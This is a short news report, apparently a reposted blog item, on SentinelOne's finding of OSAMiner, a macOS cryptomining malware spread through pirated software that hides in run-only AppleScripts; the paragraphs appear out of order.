The use of AppleScript, while rare, remains to be a vulnerability for macOS users, according to Stokes. Stokes further explained, “Run-only AppleScripts are surprisingly rare in the macOS malware world, but both the longevity of and the lack of attention to the macOS.OSAMiner campaign, which has likely been running for at least 5 years, shows exactly how powerful run-only AppleScripts can be for evasion and anti-analysis.” Researchers are forced to use other tools to analyze the code. It is important to note that this method of infection poses various challenges because the source code is not human-readable.
#Macos malware years used runonly applescripts software
The malicious software embeds itself in the system through a series of scripts, with the process being triggered by the installation of infected pirated programs. Stokes explained that the researchers from the said firms were not able to access the malware’s entire code, which has been hidden under layers of run-only AppleScript files. SentinelOne researcher for macOS malware Phil Stokes reveals that in August and September 2018, the firms have identified and evaluated OSAMiner, but were only able to uncover a small portion of what it can do. While SentinelOne has only recently discovered the malware, the firm noted that two Chinese security companies have reported older versions of it a few years prior. It also appears to be more active in Chinese and Asia-Pacific communities, added the spokesperson.
OSAMiner, which infects victim systems and uses them to mine cryptocurrency undiscovered, “has been active for a long time and has evolved in recent months,” according to a SentinelOne spokesperson via an email interview with ZDNet. The malware is distributed through pirated applications and is mostly observed in Asia.
Cybersecurity startup SentinelOne recently uncovered the existence of OSAMiner, a malware that has been operating in macOS since around 2015, reported ZDNet.
0 kommentar(er)
